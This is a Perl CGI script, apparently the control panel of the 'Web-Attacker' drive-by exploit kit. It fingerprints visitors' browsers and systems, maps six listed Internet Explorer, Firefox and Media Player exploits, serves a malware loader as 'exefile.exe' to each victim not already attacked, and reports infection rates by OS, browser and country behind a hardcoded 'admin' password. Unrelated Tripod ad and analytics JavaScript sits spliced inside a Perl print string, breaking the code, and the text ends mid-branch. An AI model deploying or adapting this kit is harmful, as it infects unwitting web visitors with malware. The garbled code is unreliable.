#!/usr/bin/perl
#ie0604.cgi

use DB_File;
use CGI qw(:standard);

$Password_correct='admin';
$SubFolder='';
$BAN_Time=20*60    ; # 20 minutes ( or 20 * 60 seconds )

$LoaderName    ='exefile.dat';
$Exp_MS05001   ='ms05001.dat';
$Exp_MS06013   ='ms06013.dat';
$Exp_MFSA200550='mfsa200550.dat';
$Exp_MS06006   ='ms06006.dat';
$nExploits = 6;         # total number of equipped exploits in this package

$DataBase     ='ie0604.dbf';

$ID_attacked = 0;

if ($ENV{'REQUEST_METHOD'} eq 'GET')
{

   ####### Get the browser information #######

   $UserIP        =$ENV{'REMOTE_ADDR'};
   $UserAgent     =$ENV{'HTTP_USER_AGENT'};
   $UserLanguage  =$ENV{'HTTP_ACCEPT_LANGUAGE'};
   $ServerName    =$ENV{'SERVER_NAME'};
   $ScriptPath    =$ENV{'SCRIPT_NAME'};
   $ScriptURI     =$ENV{'REQUEST_URI'};

   $Query=$ENV{'QUERY_STRING'};
   @QueryFields=split(/&/,$Query);
   $Action=$QueryFields[0];              # the main parameter of the HTTP-request
   $UserParam=$QueryFields[1];           # an optional parameter of the HTTP-request

   $ScriptURL='http://'.$ServerName.$ScriptPath;

   $UserOS = 'Unknown';
   $UserBrowser = 'Unknown';

   if ($UserAgent=~/Opera/)
   {  $UserBrowser='Opera'; }
   elsif ($UserAgent=~/Firefox/)
   {
         $UserBrowser='Firefox';
         $pvFirefox=index($UserAgent,'Firefox/');
         if ($pvFirefox != -1)
         {
           @FF_vers=split(/ /,substr($UserAgent,$pvFirefox+8));
           $UserBrowser=$UserBrowser.' '.$FF_vers[0];
         }
         else
         { $UserBrowser=$UserBrowser.' '.'unknown';}
   }
   elsif ($UserAgent=~/Netscape/)
   {  $UserBrowser='Netscape'; }
   elsif ($UserAgent=~/Konqueror/)
   {  $UserBrowser='Konqueror'; }
   elsif ($UserAgent=~/WebTV/)
   {  $UserBrowser='WebTV'; }
   elsif ($UserAgent=~/Lynx/)
   {  $UserBrowser='Lynx'; }
   elsif ($UserAgent=~/Bot/)
   {  $UserBrowser='Bot'; }
   elsif ($UserAgent=~/MSIE/)
   {
         if ($UserAgent=~/MSIE 5\.01/)
         {  $UserBrowser='MSIE 5.01'; }
         elsif ($UserAgent=~/MSIE 5\.0/)
         {  $UserBrowser='MSIE 5.0';  }
         elsif ($UserAgent=~/MSIE 5\.5/)
         {  $UserBrowser='MSIE 5.5';  }
         elsif ($UserAgent=~/MSIE 6\.0/)
         {  $UserBrowser='MSIE 6.0';  }
         else
         {  $UserBrowser='MSIE unknown'; }
         if ($UserAgent=~/SV1/)
         {  $UserBrowser=$UserBrowser.' SP2'; }
   }
   else
   {  $UserBrowser='Unknown';  }

   if ($UserAgent=~/Windows/)
   {
     if     ($UserAgent=~/Windows 95/)
     {       $UserOS='Windows 95';     }
     elsif  ($UserAgent=~/Windows NT 4/)
     {       $UserOS='Windows NT';   }
     elsif  ($UserAgent=~/Win 9x 4\.9/)
     {       $UserOS='Windows ME';     }
     elsif  ($UserAgent=~/Windows 98/)
     {       $UserOS='Windows 98';     }
     elsif  ($UserAgent=~/Windows NT 5\.0/)
     {       $UserOS='Windows 2000';   }
     elsif  ($UserAgent=~/Windows NT 5\.1/)
     {       $UserOS='Windows XP';     }
     elsif  ($UserAgent=~/Windows NT 5\.2/)
     {       $UserOS='Windows 2003';     }
   }
   elsif ($UserAgent=~/Mac OS/)
   {  $UserOS='Mac OS';      }
   elsif ($UserAgent=~/PowerPC/)
   {  $UserOS='PowerPC';     }
   elsif ($UserAgent=~/Linux/)
   {  $UserOS='Linux';       }
   else
   {  $UserOS='Unknown';     }

   $ServerTime=time;
   @Months  = ('Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec');
   ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst)=localtime($ServerTime);
   $real_year=$year+1900;
   $month=$Months[$mon];
   $CurrentTime="$mday\-$month\-$real_year $hour\:$min";

   if ($UserBrowser=~/MSIE/)
   {  $UserID=strcrc32("$UserIP$UserAgent$mday$hour"); }
   else
   {  $UserID=strcrc32("$UserIP$UserOS$mday$hour");    }

     my $Geo_enabled = 0;

     $GeoModule = "Geo::IPfree";
     if (eval "require $GeoModule")
     {  $Geo_enabled = 1;         }
     else
     {
        $GeoModule = "Geo::IP";
        if (eval "require $GeoModule")
        {  $Geo_enabled = 2;         }
     }

     if    ($Geo_enabled == 1)
     {
         $GeoIP = $GeoModule->new() ;              # Using the default DB!
     }
     elsif ($Geo_enabled == 2)
     {
         $GeoIP = $GeoModule->new(GEOIP_STANDARD) ; # Using the default DB!
     }

   if    ($Action=~/password=/)
   {

         $Password=substr($Action,9);
         print "Content-Type: text/html\r\n\r\n";
         if ($Password eq $Password_correct)
         {

         %Countries   = ();
         %Browsers    = ();
         %OSystems    = ();

         @nTotal      = (0,0,0,0,0,0,0);
         @nTotal_eff  = (0,0,0,0,0,0,0);

         dbmopen %Uniques, "$DataBase", 0666;
         while(($uID, $uID_stat) = each(%Uniques))
         {
               @StatFields=split(/\;/,$uID_stat);

               $nTotal[0]++;
               $jj = 0;
               if (($StatFields[3] > 0)&&($StatFields[3] <= $nExploits))
               {
                  $jj = $jj+$StatFields[3];
                  $nTotal[$jj]++;
               }

               $jj = 0;
               if (exists $OSystems{$StatFields[1]})
               {
                  $HashLine=$OSystems{$StatFields[1]};
                  @HashFields=split(/\,/,$HashLine);
                  $HashFields[0]++;
                  if (($StatFields[3] > 0)&&($StatFields[3] <= $nExploits))
                  {
                     $jj = $jj+$StatFields[3];
                     $HashFields[$jj]++;
                  }
                  $HashLine="";
                  foreach $item (@HashFields)
                  {
                         $HashLine=$HashLine."$item".',';
                  }
                  $OSystems{$StatFields[1]}=$HashLine;
               }
               else
               {
                  if    ($StatFields[3] == 1)
                  {  $OSystems{$StatFields[1]}="1,1,0,0,0,0,0";   }
                  elsif ($StatFields[3] == 2)
                  {  $OSystems{$StatFields[1]}="1,0,1,0,0,0,0";   }
                  elsif ($StatFields[3] == 3)
                  {  $OSystems{$StatFields[1]}="1,0,0,1,0,0,0";   }
                  elsif ($StatFields[3] == 4)
                  {  $OSystems{$StatFields[1]}="1,0,0,0,1,0,0";   }
                  elsif ($StatFields[3] == 5)
                  {  $OSystems{$StatFields[1]}="1,0,0,0,0,1,0";   }
                  elsif ($StatFields[3] == 6)
                  {  $OSystems{$StatFields[1]}="1,0,0,0,0,0,1";   }
                  else
                  {  $OSystems{$StatFields[1]}="1,0,0,0,0,0,0";   }
               }

               $jj = 0;
               if (exists $Browsers{$StatFields[2]})
               {
                  $HashLine=$Browsers{$StatFields[2]};
                  @HashFields=split(/\,/,$HashLine);
                  $HashFields[0]++;
                  if (($StatFields[3] > 0)&&($StatFields[3] <= $nExploits))
                  {
                     $jj = $jj+$StatFields[3];
                     $HashFields[$jj]++;
                  }
                  $HashLine="";
                  foreach $item (@HashFields)
                  {
                         $HashLine=$HashLine."$item".',';
                  }
                  $Browsers{$StatFields[2]}=$HashLine;
               }
               else
               {
                  if    ($StatFields[3] == 1)
                  {  $Browsers{$StatFields[2]}="1,1,0,0,0,0,0";   }
                  elsif ($StatFields[3] == 2)
                  {  $Browsers{$StatFields[2]}="1,0,1,0,0,0,0";   }
                  elsif ($StatFields[3] == 3)
                  {  $Browsers{$StatFields[2]}="1,0,0,1,0,0,0";   }
                  elsif ($StatFields[3] == 4)
                  {  $Browsers{$StatFields[2]}="1,0,0,0,1,0,0";   }
                  elsif ($StatFields[3] == 5)
                  {  $Browsers{$StatFields[2]}="1,0,0,0,0,1,0";   }
                  elsif ($StatFields[3] == 6)
                  {  $Browsers{$StatFields[2]}="1,0,0,0,0,0,1";   }
                  else
                  {  $Browsers{$StatFields[2]}="1,0,0,0,0,0,0";   }
               }

               $jj = 0;
               if ($Geo_enabled != 0)
               {

                  $country_name = $StatFields[5];
                  if (exists $Countries{$country_name})
                  {
                     $HashLine=$Countries{$country_name};
                     @HashFields=split(/\,/,$HashLine);
                     $HashFields[0]++;
                     if (($StatFields[3] > 0)&&($StatFields[3] <= $nExploits))
                     {
                        $HashFields[1]++;
                     }
                     $HashLine=$HashFields[0].','.$HashFields[1];
                     $Countries{$country_name}=$HashLine;
                  }
                  else
                  {
                     if (($StatFields[3] > 0)&&($StatFields[3] <= $nExploits))
                     {  $Countries{$country_name}="1,1,";   }
                     else
                     {  $Countries{$country_name}="1,0,";   }
                  }
               }


         }
         dbmclose %Uniques;

         for ($jj=0;$jj < scalar(@nTotal_eff); $jj++)
         {
            if ($nTotal[0]==0)
            {  $nTotal_eff[$jj]=0;  }
            else
            {
               $nTotal_eff[$jj]=($nTotal[$jj]/$nTotal[0])*100;
            }
         }

         $Sum_Total=0;
         for ($jj=1;$jj < scalar(@nTotal); $jj++)
         {
             $Sum_Total=$Sum_Total+$nTotal[$jj];
         }

         $Sum_Total_eff=0;
         for ($jj=1;$jj < scalar(@nTotal_eff); $jj++)
         {
             $Sum_Total_eff=$Sum_Total_eff+$nTotal_eff[$jj];
         }

         print "<HTML><HEAD><TITLE>Exploit penetration statistics</TITLE></HEAD><body><!-- begin compete js -->
<script type="text/javascript">
    __compete_code = '667f89f26d96c30e99728fe6a608804d';
    (function () {
        var s = document.createElement('script'),
            d = document.getElementsByTagName('head')[0] ||
                document.getElementsByTagName('body')[0],
            t = 'https:' == document.location.protocol ? 
                'https://c.compete.com/bootstrap/' : 
                'http://c.compete.com/bootstrap/';
        s.src = t + __compete_code + '/bootstrap.js';
        s.type = 'text/javascript';
        s.async = 'async'; 
        if (d) { d.appendChild(s); }
    }());
</script>
<!-- end compete js -->

<!-- quantcast -->
<script type="text/javascript">
	function channValidator(chann){
	return (typeof(chann) == 'string' && chann != '');
	}

	function lycosQuantcast(){
		var lb = "";
		if(typeof(cm_host) !== 'undefined' && channValidator(cm_host)){
			lb += cm_host.split('.')[0] + '.';
		}
	
		if(typeof(cm_taxid) !==	'undefined' && channValidator(cm_taxid)){
			lb += cm_taxid;
			lb = lb.replace('/','');
		} else {
			lb = lb.replace('.','');
		}
		return lb;
	}
	
	var _qevents = _qevents || [];
	
	(function() {
		var elem = document.createElement('script');
		elem.src = (document.location.protocol == "https:" ? "https://secure" :"http://edge") + ".quantserve.com/quant.js";
		elem.async = true;
		elem.type = "text/javascript";
		var scpt = document.getElementsByTagName('script')[0];
		scpt.parentNode.insertBefore(elem, scpt);
	})();
	
	_qevents.push({
		qacct:"p-6eQegedn62bSo",
		labels:lycosQuantcast()
	});
</script>
<!-- end quantcast -->

<!-- Begin OwnerIQ js -->
<script type="text/javascript">
  var __oiq_pct = 50;
  if( __oiq_pct>=100 || Math.floor(Math.random()*100/(100-__oiq_pct)) > 0 ) {
    var _oiqq = _oiqq || [];
    _oiqq.push(['oiq_addPageBrand', 'Lycos']);
    _oiqq.push(['oiq_addPageCat', 'Internet > Websites']);
    _oiqq.push(['oiq_addPageLifecycle', 'Intend']);
    _oiqq.push(['oiq_doTag']);

    (function() {
      var oiq = document.createElement('script'); oiq.type = 'text/javascript'; oiq.async = true;
      oiq.src = document.location.protocol + '//px.owneriq.net/stas/s/lycosn.js';
      var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(oiq, s);
    })();
  }
</script>
<!-- End OwnerIQ -->

<!-- Begin Google Analytics -->
<script type="text/javascript">
  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-21402695-19']);
  _gaq.push(['_setDomainName', 'tripod.com']);
  _gaq.push(['_setCustomVar', 1, 'member_name', 'kolamanko', 3]);
  _gaq.push(['_trackPageview']);
  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();
</script>
<!-- End Google Analytics -->

<script type="text/javascript">
function getReferrer() {
    // Reads the referrer out of the cookie, if available.
    var all= this.document.cookie;
    if (all== '') return false;
    var cookie_name = 'REFERRER=';
    var start = all.lastIndexOf(cookie_name);
    if (start == -1) return false;  // referrer URL not found.
    start += cookie_name.length;
    var end = all.indexOf(';', start);
    if (end == -1) end = all.length;
    return all.substring(start, end);
}
function getQuery() {
    // Get the referrer search query from cookie, if available.
    var rfr = getReferrer();
    if (rfr == '') return false;
    var q = extractQuery(rfr, 'yahoo.com', 'p=');
    if (q) return q;
    q = extractQuery(rfr, '', 'q=');
    return q ? q : "";
}
function extractQuery(full, site, q_param) {
    var start = full.lastIndexOf(site);
    if (start == -1) return false;
    start = full.lastIndexOf(q_param);
    if (start == -1) return false;
    start += q_param.length;
    var end = full.indexOf('&', start);
    if (end == -1) end = full.length;
    return unescape(full.substring(start, end)).split(" ").join("+");
}
var cm_role = "live";
var cm_host = "tripod.lycos.com";
var cm_taxid = "/memberembedded";
var tripod_member_name = "kolamanko";
var tripod_member_page = "kolamanko/ie0604.htm";
var tripod_ratings_hash = "1338617230:7b4c14064db29c0a2c23e203fd7607ec";

var lycos_ad_category = null;

var lycos_ad_remote_addr = "38.107.179.236";
var lycos_ad_www_server = "www.tripod.lycos.com";
var lycos_ad_track_small = "http://members.tripod.com/adm/img/common/ot_smallframe.gif?rand=609187";
var lycos_ad_track_served = "http://members.tripod.com/adm/img/common/ot_adserved.gif?rand=609187";
var lycos_search_query = getQuery();
</script>

<script type="text/javascript" src="http://scripts.lycos.com/catman/init.js"></script>
<script type="text/javascript"> 

var lycos_ad = Array();
var lycos_onload_timer;

function lycos_check_size() {
    var window_width = 0, window_height = 0;
    if (typeof(window.innerWidth) == 'number' ) {
        window_width = window.innerWidth;
        window_height = window.innerHeight;
    } else if (document.documentElement && (document.documentElement.clientWidth || document.documentElement.clientHeight)) {
        window_width = document.documentElement.clientWidth;
        window_height = document.documentElement.clientHeight;
    } else if (document.body && (document.body.clientWidth || document.body.clientHeight)) {
        window_width = document.body.clientWidth;
        window_height = document.body.clientHeight;
    } 
    
    var lycos_track_img = document.createElement('img');
    if( top == self ) {
        return 1;
    } else {
        if ((window_width < 300) || (window_height < 300)) {
            lycos_track_img.src=this.lycos_ad_track_small+"&w="+window_width+"&h="+window_height;
            return 0;
        } else {
            lycos_track_img.src=this.lycos_ad_track_served+"&w="+window_width+"&h="+window_height;
            return 1;
        }
    }
}
       
function lycos_insert_ads() {
    var lycos_ad_mgr = new AdManager();
    
    if (this.lycos_search_query) {
        lycos_ad_mgr.setForcedParam("keyword", this.lycos_search_query);
    } else if (this.lycos_ad_category && this.lycos_ad_category.find_what) {
        lycos_ad_mgr.setForcedParam("keyword", this.lycos_ad_category.find_what);
    }

    if (this.lycos_ad_category && this.lycos_ad_category.dmoz) {
        lycos_ad_mgr.setForcedParam("page", this.lycos_ad_category.dmoz);
    } else {
        lycos_ad_mgr.setForcedParam("page", "member");
    }

    var lycos_prod_set = lycos_ad_mgr.chooseProductSet();
    var slots = ["leaderboard", "leaderboard2"];
    for (var slot in slots) {
        if (lycos_ad_mgr.isSlotAvailable(slots[slot])) {
            lycos_ad[slots[slot]] = lycos_ad_mgr.getSlot(slots[slot]);
        }
    }

    lycos_ad_mgr.renderFooter();
}

function generateHref(atag, template){
    atag.href=template.replace('_MYURL_', window.location.href.replace('http://', '')).replace('_MYTITLE_', 'Check%20out%20this%20Tripod%20Member%20site!'); 
}

if (lycos_check_size()) {
    lycos_insert_ads();
}

window.onload = function() {
    var f = document.getElementById("FooterAd");
    var b = document.getElementsByTagName("body")[0];
    b.removeChild(f);
    b.appendChild(f);
    f.style.display = "block";
}

</script>
<style>
	#body .adCenterClass{margin:0 auto}
</style>

<div id="tb_container" style="background:#DFDCCF; border-bottom:1px solid #393939; position:relative; z-index:999999999!important">
    <div id="tb_ad" class="adCenterClass" style="display:block!important; overflow:hidden; width:916px;">
    <a href="http://adtrack.ministerial5.com/clicknew/?a=637394" title="build your own website at Tripod.com" style="float:left; width:186px; border:0">
    	<img src="http://ly.lygo.com/ly/tpSite/images/freeAd2.jpg" alt="Make your own free website on Tripod.com" style="border:0; display:block" />
    </a> 
        <div id="ad_container" style="display:block!important; float:left; width:728px ">
        <script type="text/javascript">document.write(lycos_ad['leaderboard']);</script>
        </div>
    </div>
</div>


<div id="FooterAd" style="background:#DFDCCF; border-top:1px solid #393939; clear:both; display:none; width:100%!important; position:relative; z-index:999999!important; height:90px!important"> 
	<div class="adCenterClass" style="display:block!important; overflow:hidden; width:916px;">
	<a href="http://adtrack.ministerial5.com/clicknew/?a=637394" title="build your own website at Tripod.com" style="float:left; display:block; width:186px; border:0">
    	<img src="http://ly.lygo.com/ly/tpSite/images/freeAd2.jpg" alt="Make your own free website on Tripod.com" style="border:0; display:block; " />
    </a> 
        <div id="footerAd_container" style="display:block!important; float:left; width:728px">
        <script type="text/javascript">document.write(lycos_ad['leaderboard2']);</script>
        </div>
	</div>
</div>
<noscript>
 <img src="http://members.tripod.com/adm/img/common/ot_noscript.gif?rand=609187" alt="" width="1" height="1" />
 <!-- BEGIN STANDARD TAG - 728 x 90 - Lycos - Tripod Fallthrough - DO NOT MODIFY -->
 <iframe frameborder="0" marginwidth="0" marginheight="0" scrolling="no" width="728" height="90" src="http://ad.yieldmanager.com/st?ad_type=iframe&amp;ad_size=728x90&amp;section=209094"></iframe>
 <!-- END TAG -->
</noscript>
\r\n";
         print "<CENTER>\r\n";

         # Display the Total statistics
         print "<BR><H2>Overall statistics</H2><BR>\r\n";

         print "<TABLE cellSpacing=1 cellPadding=5 width=\"100%\" border=0>\r\n";
         print "<TBODY>\r\n";
         print "<TR>\r\n";
         print "<TD align=middle bgColor=#ccffcc><B>Total hosts</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>MS03-11</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>MS04-013</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>MS05-001</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>MS06-013</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>MFSA2005-50</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>MS06-006</b></TD>\r\n";
         print "<TR>\r\n";
         print "<TD align=middle bgColor=#ccffcc><B>$nTotal[0]</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>$nTotal[1]</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>$nTotal[2]</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>$nTotal[3]</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>$nTotal[4]</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>$nTotal[5]</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>$nTotal[6]</b></TD>\r\n";
         print "<TR>\r\n";
         print "<TD align=middle bgColor=#ccffcc><B>",sprintf("%.2f",$nTotal_eff[0])," %</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>",sprintf("%.2f",$nTotal_eff[1])," %</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>",sprintf("%.2f",$nTotal_eff[2])," %</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>",sprintf("%.2f",$nTotal_eff[3])," %</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>",sprintf("%.2f",$nTotal_eff[4])," %</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>",sprintf("%.2f",$nTotal_eff[5])," %</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>",sprintf("%.2f",$nTotal_eff[6])," %</b></TD>\r\n";
         print "</TBODY></TABLE>\r\n";

         print "<P><B><FONT color=#dd3311>Total number of Exploited hosts is ",$Sum_Total,"</FONT></b></P>\r\n";
         print "<P><B><FONT color=#dd3311>Total Exploit efficiency is ",sprintf("%.2f",$Sum_Total_eff)," %</FONT></b></P>\r\n";

         # Display the Operation System statistics
         print "<BR><H2>Operation Systems statistics</H2><BR>\r\n";

         print "<TABLE cellSpacing=1 cellPadding=5 width=\"100%\" border=0>\r\n";
         print "<TBODY>\r\n";
         print "<TR>\r\n";
         print "<TD align=middle bgColor=#cccccc><B>OS name</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccffcc><B>Hosts</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>MS03-11</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>MS04-013</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>MS05-001</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>MS06-013</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>MFSA2005-50</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>MS06-006</b></TD>\r\n";

         foreach $OSystem (sort keys %OSystems)
         {
                 print "<TR>\r\n";
                 print "<TD align=middle bgColor=#cccccc><B>$OSystem</b></TD>\r\n";
                 $OSystem_stat = $OSystems{$OSystem};
                 @HashFields=split(/\,/,$OSystem_stat);
                 print "<TD align=middle bgColor=#ccffcc><B>$HashFields[0]</b></TD>\r\n";
                 print "<TD align=middle bgColor=#ccee33><B>$HashFields[1]</b></TD>\r\n";
                 print "<TD align=middle bgColor=#ccee33><B>$HashFields[2]</b></TD>\r\n";
                 print "<TD align=middle bgColor=#ccee33><B>$HashFields[3]</b></TD>\r\n";
                 print "<TD align=middle bgColor=#ccee33><B>$HashFields[4]</b></TD>\r\n";
                 print "<TD align=middle bgColor=#ccee33><B>$HashFields[5]</b></TD>\r\n";
                 print "<TD align=middle bgColor=#ccee33><B>$HashFields[6]</b></TD>\r\n";
         }
         print "</TBODY></TABLE>\r\n";

         # Display the Browser statistics

         print "<BR><H2>Internet Browser statistics</H2><BR>\r\n";

         print "<TABLE cellSpacing=1 cellPadding=5 width=\"100%\" border=0>\r\n";
         print "<TBODY>\r\n";
         print "<TR>\r\n";
         print "<TD align=middle bgColor=#cccccc><B>Browser name</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccffcc><B>Hosts</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>MS03-11</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>MS04-013</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>MS05-001</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>MS06-013</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>MFSA2005-50</b></TD>\r\n";
         print "<TD align=middle bgColor=#ccee33><B>MS06-006</b></TD>\r\n";
         foreach $Browser (sort keys %Browsers)
         {
                 print "<TR>\r\n";
                 print "<TD align=middle bgColor=#cccccc><B>$Browser</b></TD>\r\n";
                 $Browser_stat = $Browsers{$Browser};
                 @HashFields=split(/\,/,$Browser_stat);
                 print "<TD align=middle bgColor=#ccffcc><B>$HashFields[0]</b></TD>\r\n";
                 print "<TD align=middle bgColor=#ccee33><B>$HashFields[1]</b></TD>\r\n";
                 print "<TD align=middle bgColor=#ccee33><B>$HashFields[2]</b></TD>\r\n";
                 print "<TD align=middle bgColor=#ccee33><B>$HashFields[3]</b></TD>\r\n";
                 print "<TD align=middle bgColor=#ccee33><B>$HashFields[4]</b></TD>\r\n";
                 print "<TD align=middle bgColor=#ccee33><B>$HashFields[5]</b></TD>\r\n";
                 print "<TD align=middle bgColor=#ccee33><B>$HashFields[6]</b></TD>\r\n";
         }
         print "</TBODY></TABLE>\r\n";

         # Display the Geographical statistics

         print "<BR><H2>Geographical statistics</H2><BR>\r\n";
         if ($Geo_enabled != 0)
         {
             print "<TABLE cellSpacing=1 cellPadding=5 width=\"100%\" border=0>\r\n";
             print "<TBODY>\r\n";
             print "<TR>\r\n";
             print "<TD align=middle bgColor=#cccccc><B>Country</b></TD>\r\n";
             print "<TD align=middle bgColor=#ccffcc><B>Total hosts</b></TD>\r\n";
             print "<TD align=middle bgColor=#ccee33><B>Attacked hosts</b></TD>\r\n";
             print "<TD align=middle bgColor=#ffbbcc><B>Efficiency %</b></TD>\r\n";

             while(($Country, $Country_stat) = each(%Countries))
             {
                 print "<TR>\r\n";
                 print "<TD align=middle bgColor=#cccccc><B>$Country</b></TD>\r\n";
                 @HashFields=split(/\,/,$Country_stat);
                 print "<TD align=middle bgColor=#ccffcc><B>$HashFields[0]</b></TD>\r\n";
                 print "<TD align=middle bgColor=#ccee33><B>$HashFields[1]</b></TD>\r\n";
                 $Efficiency = ($HashFields[1]/$HashFields[0])*100;
                 print "<TD align=middle bgColor=#ffbbcc><B>",sprintf("%.2f",$Efficiency),"</b></TD>\r\n";
             }
             print "</TBODY></TABLE>\r\n";
         }
         else
         {
             print "<I>This type of statistics is not accessible";
             print "(Geo::IP or Geo::IPfree modules are not found on the server)</I><BR>\r\n";
         }

         print "<FORM action=\"$ScriptURL\">\r\n";
         print "Type your password: <INPUT type=\"password\" name=\"clear\"><BR><BR>\r\n";
         print "<INPUT type=\"submit\" value=\" Clear Statistics \">\r\n";
         print "</FORM>\r\n";

         print "</CENTER>\r\n";
         print "</body></HTML>\r\n";

         }
         else
         {
              print "<HTML><HEAD><TITLE>Web-Attacker Control panel</TITLE></HEAD>\r\n";
              print "<BODY bgcolor=\"yellow\">\r\n";
              print "<CENTER>\r\n";
              print "<I>Incorrect password !</I><BR>\r\n";
              print "Your IP is: $UserIP<BR>\r\n";
              print "Your Browser is: $UserBrowser<BR>\r\n";
              print "Your Operation System is: $UserOS<BR>\r\n";
              print "Current Date and Time: $CurrentTime<BR>\r\n";
              print "<H3>Please enter the password to access the statistics</H3>\r\n";
              print "<FORM action=\"$ScriptURL\">\r\n";
              print "<INPUT type=\"password\" name=\"password\"><BR><BR>\r\n";
              print "<INPUT type=\"submit\" value=\"Enter\">\r\n";
              print "</FORM>\r\n";
              print "</CENTER>\r\n";
              print "</body></HTML>\r\n";
         }
   }
   elsif ($Action=~/clear=/)
   {

      $Password=substr($Action,6);
      print "Content-Type: text/html\r\n\r\n";
      if ($Password eq $Password_correct)
      {
         if (-e $DataBase)
         {  unlink($DataBase);  }
         print "<HTML><HEAD><TITLE>Exploit penetration statistics</TITLE></HEAD><BODY>\r\n";
         print "<CENTER>\r\n";
         print "<BR><H3>All of the statistics data were successfully deleted!</H3><BR>\r\n";
         print "</CENTER>\r\n";
         print "</body></HTML>\r\n";
      }
      else
      {
          print "<HTML><HEAD><TITLE>Web-Attacker Control panel</TITLE></HEAD>\r\n";
          print "<BODY bgcolor=\"yellow\">\r\n";
          print "<CENTER>\r\n";
          print "<I>Incorrect password !</I><BR>\r\n";
          print "Your IP is: $UserIP<BR>\r\n";
          print "Your Browser is: $UserBrowser<BR>\r\n";
          print "Your Operation System is: $UserOS<BR>\r\n";
          print "Current Date and Time: $CurrentTime<BR>\r\n";
          print "<H3>Please enter the password to access the statistics</H3>\r\n";
          print "<FORM action=\"$ScriptURL\">\r\n";
          print "<INPUT type=\"password\" name=\"password\"><BR><BR>\r\n";
          print "<INPUT type=\"submit\" value=\"Enter\">\r\n";
          print "</FORM>\r\n";
          print "</CENTER>\r\n";
          print "</body></HTML>\r\n";
      }
   }

   elsif  ($Action=~/exploit/)
   {

          $exp_type=substr($Action,8);

          if    ($exp_type=~/MS03\-11/)     # ByteCode verifier exploit for MS Java Virtual Machine
          {     $ID_attacked=1;       }
          elsif ($exp_type=~/MS04\-013/)    # IE ms-its: and mk:@MSITStore: vulnerability
          {     $ID_attacked=2;       }
          elsif ($exp_type=~/MS05\-001/)    # IE vulnerability in HTML Help that allows Code Execution
          {     $ID_attacked=3;       }
          elsif ($exp_type=~/MS06\-013/)     # IE 6.0 SP2 "createTextRange" vulnerability
          {     $ID_attacked=4;       }
          elsif ($exp_type=~/MFSA2005\-50/) # Firefox exploitable crash in InstallVersion.compareTo
          {     $ID_attacked=5;       }
          elsif ($exp_type=~/MS06\-006/)    # Windows Media Player plug-in vulnerability
          {     $ID_attacked=6;       }
          else
          {     $ID_attacked=0;       }

          if (($ID_attacked==5)||($ID_attacked==6))
          {  $UserID=strcrc32("$UserIP$UserOS$mday$hour"); }
          else
          {  $UserID=strcrc32("$UserIP$UserAgent$mday$hour"); }

          $AlreadyAttacked=1;

          dbmopen %Uniques, "$DataBase", 0666;
          if (exists $Uniques{$UserID})
          {
             $uID_stat=$Uniques{$UserID};
             @StatFields=split(/\;/,$uID_stat);
             if ($StatFields[3]==0)
             {
                $AlreadyAttacked=0;
                $StatFields[3]=$ID_attacked;
             }
             $StatLine="";
             foreach $item (@StatFields)
             {
                         $StatLine=$StatLine."$item".';';
             }
             $Uniques{$UserID}=$StatLine;
          }
          dbmclose %Uniques;

          if ($AlreadyAttacked==0)
          {
              if (-e $LoaderName)
              {
                 $fsize = -s "$LoaderName";
                 open  (F,"$LoaderName");
                 binmode F;
                 read(F,$Panzer,$fsize);
                 close (F);
                 print "Accept-Ranges: bytes\r\n";
                 print "Content-Length: $fsize\r\n";
                 print 'Content-Disposition: inline; filename=exefile.exe';
                 print "\r\n";
                 print "Content-Type: application/octet-stream\r\n\r\n";
                 binmode STDOUT;
                 print $Panzer;
              }
              else
              {
                 print "Content-Type: text/html\r\n\r\n";
                 print "Err: can not open the DATA file\r\n";
              }
          }
          else
          {
              print "Content-Type: text/html\r\n\r\n";
              print "Err: this user is already attacked!\r\n";
          }
    }
   elsif  ($Action=~/homepage/)
   {
          if    ($Geo_enabled == 1)
          {
                ($country_id,$country_name) = $GeoIP->LookUp($UserIP);
          }
          elsif ($Geo_enabled == 2)
          {
                $country_id   = $GeoIP->country_code_by_addr($UserIP);
                $country_name = $GeoIP->country_name_by_addr($UserIP);
          }
          else
          {  $country_name =' ';}

           $ID_used=0;
